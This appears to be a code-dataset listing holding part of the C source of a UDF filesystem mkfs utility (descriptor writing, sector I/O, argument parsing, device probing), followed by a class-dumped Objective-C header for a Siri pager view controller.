				    (NBBY - part_len % NBBY);
			wtfs(part_unalloc + part_start, size, (char *)tp);
		}
		free((char *)sbp);
	}
	/*
	 * Volume Integrity Descriptor
	 */
	nextblock = INTSEQSTART;
	endblock = nextblock + INTSEQLEN / sectorsize;
	/* LINTED */
	lvip = (struct log_vol_int_desc *)&lvid;
	tp = &lvip->lvid_tag;
	tp->tag_id = UD_LOG_VOL_INT;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_loc = nextblock;
	setstamp(&lvip->lvid_tstamp);
	lvip->lvid_int_type = LOG_VOL_CLOSE_INT;	/* cleanly closed */
	setextad(&lvip->lvid_nie, 0, 0);
	lvip->lvid_npart = 1;
	/* NOTE(review): 0x2e presumably sizeof the impl-use area -- confirm. */
	lvip->lvid_liu = 0x2e;
	lvip->lvid_uniqid = MAXID + 1;
	lvip->lvid_fst[0] = part_len - nextlogblock;	/* Free space */
	lvip->lvid_fst[1] = part_len;	/* Size */
	lviup = (struct lvid_iu *)&lvip->lvid_fst[2];
	bcopy(&sunmicro, &lviup->lvidiu_regid, sizeof (regid_t));
	lviup->lvidiu_nfiles = 0;
	lviup->lvidiu_ndirs = 1;	/* just the root */
	lviup->lvidiu_mread = 0x102;
	lviup->lvidiu_mwrite = 0x102;
	lviup->lvidiu_maxwr = 0x150;
	tp->tag_crc_len = sizeof (struct log_vol_int_desc) + lvip->lvid_liu -
	    sizeof (struct tag);
	maketag(tp, tp);
	wtfs(nextblock, sectorsize, (char *)tp);
	nextblock++;
	/*
	 * Terminating Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	tdp = (struct term_desc *)buf;
	tp = &tdp->td_tag;
	tp->tag_id = UD_TERM_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct term_desc) - sizeof (struct tag);
	tp->tag_loc = nextblock;
	maketag(tp, tp);
	wtfs(nextblock, sectorsize, (char *)tp);
	nextblock++;
	/* Zero out the rest of the LVI extent */
	bzero(buf, sectorsize);
	while (nextblock < endblock)
		wtfs(nextblock++, sectorsize, buf);
}
/*
* read a block from the file system
*/
/*
 * Read "size" bytes at sector "bno" of the input device into "bf".
 * Any seek or short-read failure is fatal (exit 32).
 */
static void
rdfs(daddr_t bno, int size, char *bf)
{
	int nread;
	int saverr;

	if (llseek(fsi, (offset_t)bno * sectorsize, 0) < 0) {
		saverr = errno;
		(void) fprintf(stderr,
		    gettext("seek error on sector %ld: %s\n"),
		    bno, strerror(saverr));
		exit(32);
	}

	nread = read(fsi, bf, size);
	if (nread == size)
		return;

	/* Short reads and hard errors are treated alike. */
	saverr = errno;
	(void) fprintf(stderr,
	    gettext("read error on sector %ld: %s\n"),
	    bno, strerror(saverr));
	exit(32);
}
/*
* write a block to the file system
*/
/*
 * Write "size" bytes at sector "bno" of the output device from "bf".
 * The seek is performed even under -N (Nflag) so that device-size
 * validation still happens; only the write itself is suppressed.
 * Seek or short-write failures are fatal (exit 32).
 */
static void
wtfs(daddr_t bno, int size, char *bf)
{
	int nwritten;
	int saverr;

	if (fso == -1)
		return;

	if (llseek(fso, (offset_t)bno * sectorsize, 0) < 0) {
		saverr = errno;
		(void) fprintf(stderr,
		    gettext("seek error on sector %ld: %s\n"),
		    bno, strerror(saverr));
		exit(32);
	}

	/* -N: dry run -- validate the seek but never touch the media. */
	if (Nflag)
		return;

	nwritten = write(fso, bf, size);
	if (nwritten == size)
		return;

	saverr = errno;
	(void) fprintf(stderr,
	    gettext("write error on sector %ld: %s\n"),
	    bno, strerror(saverr));
	exit(32);
}
/*
 * Print the udfs mkfs usage summary to stderr and exit(32).
 * Never returns.
 */
static void
usage()
{
	(void) fprintf(stderr,
	    gettext("udfs usage: mkfs [-F FSType] [-V]"
	    " [-m] [-o options] special size(sectors)\n"));
	(void) fprintf(stderr,
	    gettext(" -m : dump fs cmd line used to make"
	    " this partition\n"));
	(void) fprintf(stderr,
	    gettext(" -V : print this command line and return\n"));
	/* Shows the current defaults for the -o suboptions. */
	(void) fprintf(stderr,
	    gettext(" -o : udfs options: :psize=%d:label=%s\n"),
	    sectorsize, udfs_label);
	(void) fprintf(stderr,
	    gettext("NOTE that all -o suboptions: must"
	    " be separated only by commas so as to\n"));
	(void) fprintf(stderr,
	    gettext("be parsed as a single argument\n"));
	exit(32);
}
/*ARGSUSED*/
static void
dump_fscmd(char *fsys, int fsi)
{
(void) printf(gettext("mkfs -F udfs -o "));
(void) printf("psize=%d,label=\"%s\" %s %d\n",
sectorsize, oldlabel, fsys, oldfssize);
}
/* number ************************************************************* */
/* */
/* Convert a numeric arg to binary */
/* */
/* Arg: big - maximum valid input number */
/* Global arg: string - pointer to command arg */
/* */
/* Valid forms: 123 | 123k | 123*123 | 123x123 */
/* */
/* Return: converted number */
/* */
/* ******************************************************************** */
/*
 * Parse the numeric argument at the global "string" cursor, supporting
 * an optional leading '-', a 'k' (x1024) suffix and a single '*' or 'x'
 * multiplication (handled by recursing on the right-hand factor).
 * The FOUND_MULT/FOUND_K bits in the global number_flags persist across
 * the recursion so each may appear at most once per argument.
 * Advances "string" past the consumed text; exits(2) on any error or
 * when the result exceeds "big"/BIG or is negative.
 */
static int32_t
number(long big, char *param)
{
	char *cs;
	int64_t n = 0;
	int64_t cut = BIG;
	int32_t minus = 0;
#define FOUND_MULT 0x1
#define FOUND_K 0x2
	cs = string;
	if (*cs == '-') {
		minus = 1;
		cs++;
	}
	n = 0;
	while ((*cs != ' ') && (*cs != '\0') && (*cs != ',')) {
		if ((*cs >= '0') && (*cs <= '9')) {
			n = n * 10 + *cs - '0';
			cs++;
		} else if ((*cs == '*') || (*cs == 'x')) {
			if (number_flags & FOUND_MULT) {
				(void) fprintf(stderr,
				    gettext("mkfs: only one \"*\" "
				    "or \"x\" allowed\n"));
				exit(2);
			}
			number_flags |= FOUND_MULT;
			/* Recurse for the right factor; it moves "string". */
			cs++;
			string = cs;
			n = n * number(big, param);
			cs = string;
			continue;
		} else if (*cs == 'k') {
			if (number_flags & FOUND_K) {
				(void) fprintf(stderr,
				    gettext("mkfs: only one \"k\" allowed\n"));
				exit(2);
			}
			number_flags |= FOUND_K;
			n = n * 1024;
			cs++;
			continue;
		} else {
			(void) fprintf(stderr,
			    gettext("mkfs: bad numeric arg: \"%s\"\n"),
			    string);
			exit(2);
		}
	}
	/* NOTE(review): cut is always BIG, not "big" -- confirm intent. */
	if (n > cut) {
		(void) fprintf(stderr,
		    gettext("mkfs: value for %s overflowed\n"), param);
		exit(2);
	}
	if (minus) {
		n = -n;
	}
	if ((n > big) || (n < 0)) {
		(void) fprintf(stderr,
		    gettext("mkfs: argument %s out of range\n"), param);
		exit(2);
	}
	string = cs;
	return ((int32_t)n);
}
/* match ************************************************************** */
/* */
/* Compare two text strings for equality */
/* */
/* Arg: s - pointer to string to match with a command arg */
/* Global arg: string - pointer to command arg */
/* */
/* Return: 1 if match, 0 if no match */
/* If match, also reset `string' to point to the text */
/* that follows the matching text. */
/* */
/* ******************************************************************** */
/*
 * Test whether the option text at the global "string" cursor begins
 * with "s".  On a match, advance "string" past the matched prefix and
 * return 1; otherwise leave "string" untouched and return 0.
 */
static int
match(char *s)
{
	char *cs = string;

	while (*s != '\0') {
		if (*cs++ != *s++) {
			return (0);
		}
	}
	/* Full prefix matched: consume it. */
	string = cs;
	return (1);
}
/*
 * Determine the device's native sector size via DKIOCINFO and
 * controller-type-specific follow-up ioctls.  Returns the size in
 * bytes, or 0 meaning "unknown -- keep the 2048 default".
 * Exits(1) if a SCSI device reports a sector size udfs cannot handle.
 */
static uint32_t
get_bsize()
{
	struct dk_cinfo info;
	struct fd_char fd_char;
	struct dk_minfo dkminfo;
	if (ioctl(fso, DKIOCINFO, &info) < 0) {
		perror("mkfs DKIOCINFO ");
		(void) fprintf(stdout,
		    gettext("DKIOCINFO failed using psize = 2048"
		    " for creating file-system\n"));
		return (0);
	}
	switch (info.dki_ctype) {
	case DKC_CDROM :
		return (2048);
	case DKC_SCSI_CCS :
		/* Reject odd sector sizes before falling through to floppy probe. */
		if (ioctl(fso, DKIOCGMEDIAINFO, &dkminfo) != -1) {
			if (dkminfo.dki_lbsize != 0 &&
			    POWEROF2(dkminfo.dki_lbsize / DEV_BSIZE) &&
			    dkminfo.dki_lbsize != DEV_BSIZE) {
				fprintf(stderr,
				    gettext("The device sector size "
				    "%u is not supported by udfs!\n"),
				    dkminfo.dki_lbsize);
				(void) close(fso);
				exit(1);
			}
		}
		/* FALLTHROUGH */
	case DKC_INTEL82072 :
		/* FALLTHROUGH */
	case DKC_INTEL82077 :
		/* FALLTHROUGH */
	case DKC_DIRECT :
		/* Floppy-characteristics ioctl, if the driver supports it. */
		if (ioctl(fso, FDIOGCHAR, &fd_char) >= 0) {
			return (fd_char.fdc_sec_size);
		}
		/* FALLTHROUGH */
	case DKC_PCMCIA_ATA :
		return (512);
	default :
		return (0);
	}
}
/*
* Read in the volume sequences descriptors.
*/
/*
 * Read in the volume sequences descriptors.
 *
 * Locates the Anchor Volume Descriptor Pointer at FIRSTAVDP, walks the
 * Main Volume Descriptor Sequence it points at, and records what the
 * -m option needs: serialnum, oldlabel, part_start/part_len/oldfssize.
 *
 * Returns 1 when both a Partition Descriptor and a Logical Volume
 * Descriptor were found (a plausible existing udfs), otherwise 0.
 */
static int
readvolseq()
{
	struct tag *tp;
	uint8_t *cp, *end;
	int err;
	struct pri_vol_desc *pvolp;
	/*
	 * Both must start out NULL: the "done" check below reads them
	 * even when the sequence contains no PART/LOG_VOL descriptor
	 * (previously an uninitialized read -- undefined behavior).
	 */
	struct part_desc *partp = NULL;
	struct log_vol_desc *logvp = NULL;
	struct anch_vol_desc_ptr *avp;
	char *main_vdbuf;
	uint32_t nextblock;
	avp = (struct anch_vol_desc_ptr *)malloc(sectorsize);
	if (avp == NULL) {
		(void) fprintf(stderr, gettext("Cannot allocate space for "
		    "volume sequences\n"));
		exit(32);
	}
	rdfs(FIRSTAVDP, sectorsize, (char *)avp);
	tp = (struct tag *)avp;
	err = verifytag(tp, FIRSTAVDP, tp, UD_ANCH_VOL_DESC);
	if (err)
		return (0);
	main_vdbuf = malloc(avp->avd_main_vdse.ext_len);
	if (main_vdbuf == NULL) {
		(void) fprintf(stderr, gettext("Cannot allocate space for "
		    "volume sequences\n"));
		exit(32);
	}
	rdfs(avp->avd_main_vdse.ext_loc, avp->avd_main_vdse.ext_len,
	    main_vdbuf);
	end = (uint8_t *)main_vdbuf + avp->avd_main_vdse.ext_len;
	nextblock = avp->avd_main_vdse.ext_loc;
	/* One descriptor per sector; skip anything with a bad tag. */
	for (cp = (uint8_t *)main_vdbuf; cp < end; cp += sectorsize,
	    nextblock++) {
		/* LINTED */
		tp = (struct tag *)cp;
		err = verifytag(tp, nextblock, tp, 0);
		if (err)
			continue;
		switch (tp->tag_id) {
		case UD_PRI_VOL_DESC:
			/* Bump serial number, according to spec. */
			serialnum = tp->tag_sno + 1;
			pvolp = (struct pri_vol_desc *)tp;
			/* Skip the compression-id byte of the dstring. */
			oldlabel = pvolp->pvd_vol_id + 1;
			break;
		case UD_ANCH_VOL_DESC:
			avp = (struct anch_vol_desc_ptr *)tp;
			break;
		case UD_VOL_DESC_PTR:
			break;
		case UD_IMPL_USE_DESC:
			break;
		case UD_PART_DESC:
			partp = (struct part_desc *)tp;
			part_start = partp->pd_part_start;
			part_len = partp->pd_part_length;
			oldfssize = part_start + part_len;
			break;
		case UD_LOG_VOL_DESC:
			logvp = (struct log_vol_desc *)tp;
			break;
		case UD_UNALL_SPA_DESC:
			break;
		case UD_TERM_DESC:
			/* Terminator ends the sequence. */
			goto done;
			break;
		case UD_LOG_VOL_INT:
			break;
		default:
			break;
		}
	}
done:
	if (partp == NULL || logvp == NULL) {
		return (0);
	}
	return (1);
}
/*
 * Return the size in sectors of the slice underlying fsi, taken from
 * the VTOC entry for the slice DKIOCINFO reports.  Returns 0 on any
 * failure, which callers treat as "partition size unknown".
 */
uint32_t
get_last_block()
{
	struct vtoc vtoc;
	struct dk_cinfo dki_info;
	if (ioctl(fsi, DKIOCGVTOC, (intptr_t)&vtoc) != 0) {
		(void) fprintf(stderr, gettext("Unable to read VTOC\n"));
		return (0);
	}
	if (vtoc.v_sanity != VTOC_SANE) {
		(void) fprintf(stderr, gettext("Vtoc.v_sanity != VTOC_SANE\n"));
		return (0);
	}
	if (ioctl(fsi, DKIOCINFO, (intptr_t)&dki_info) != 0) {
		(void) fprintf(stderr,
		    gettext("Could not get the slice information\n"));
		return (0);
	}
	/* NOTE(review): ">" allows index == V_NUMPAR; likely meant ">=". */
	if (dki_info.dki_partition > V_NUMPAR) {
		(void) fprintf(stderr,
		    gettext("dki_info.dki_partition > V_NUMPAR\n"));
		return (0);
	}
	return ((uint32_t)vtoc.v_part[dki_info.dki_partition].p_size);
}
|
lechium/tvOS144Headers
|
Applications/Siri/SRPagerViewController.h
|
//
// Generated by classdumpios 1.0.1 (64 bit) (iOS port by DreamDevLost)(Debug version compiled Sep 26 2020 13:48:20).
//
// Copyright (C) 1997-2019 <NAME>.
//
#import <UIKit/UIViewController.h>
#import "SRPagerViewDataSource-Protocol.h"
#import "SRPagerViewDelegate-Protocol.h"
@class NSArray, NSMutableArray, NSString, SRPagerView;
@protocol SRPagerViewControllerDelegate;
// NOTE(review): class-dump-generated header from another file, concatenated
// into this chunk.  Do not hand-edit; regenerate with classdumpios instead.
// Presumably a paging container hosting Siri page view controllers -- confirm.
@interface SRPagerViewController : UIViewController <SRPagerViewDataSource, SRPagerViewDelegate>
{
    NSMutableArray *_viewControllers;	// 8 = 0x8
    _Bool _textInputEnabled;	// 16 = 0x10
    UIViewController *_activePageViewController;	// 24 = 0x18
    id <SRPagerViewControllerDelegate> _delegate;	// 32 = 0x20
}
- (void).cxx_destruct;	// IMP=0x00000001000877cc
@property(nonatomic) __weak id <SRPagerViewControllerDelegate> delegate; // @synthesize delegate=_delegate;
@property(retain, nonatomic) UIViewController *activePageViewController; // @synthesize activePageViewController=_activePageViewController;
- (_Bool)_canShowWhileLocked;	// IMP=0x0000000100087784
- (id)_viewControllerForPageView:(id)arg1;	// IMP=0x00000001000875d8
- (void)pagerViewDidChangeTransitionState:(id)arg1;	// IMP=0x0000000100087590
- (void)pagerView:(id)arg1 didActivatePageView:(id)arg2 oldActivePageView:(id)arg3;	// IMP=0x0000000100087520
- (id)pagerView:(id)arg1 pageViewAtIndex:(long long)arg2;	// IMP=0x00000001000874bc
- (long long)numberOfPageViewsInPagerView:(id)arg1;	// IMP=0x00000001000874a4
@property(readonly, nonatomic) unsigned long long transitionState;
@property(nonatomic, getter=isPagingEnabled) _Bool pagingEnabled;
- (_Bool)containsPageViewController:(id)arg1;	// IMP=0x00000001000873a0
- (void)setActivePageViewController:(id)arg1 animated:(_Bool)arg2;	// IMP=0x0000000100087284
- (void)removePageViewController:(id)arg1;	// IMP=0x00000001000871a4
- (void)addPageViewController:(id)arg1;	// IMP=0x0000000100087138
- (void)insertPageViewController:(id)arg1 atIndex:(long long)arg2;	// IMP=0x000000010008704c
@property(readonly, nonatomic) NSArray *pageViewControllers;
- (void)viewDidLoad;	// IMP=0x0000000100086f74
- (void)loadView;	// IMP=0x0000000100086f08
- (id)initWithTextInputEnabled:(_Bool)arg1;	// IMP=0x0000000100086e7c
// Remaining properties
@property(readonly, copy) NSString *debugDescription;
@property(readonly, copy) NSString *description;
@property(readonly) unsigned long long hash;
@property(readonly) Class superclass;
@property(retain, nonatomic) SRPagerView *view; // @dynamic view;
@end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.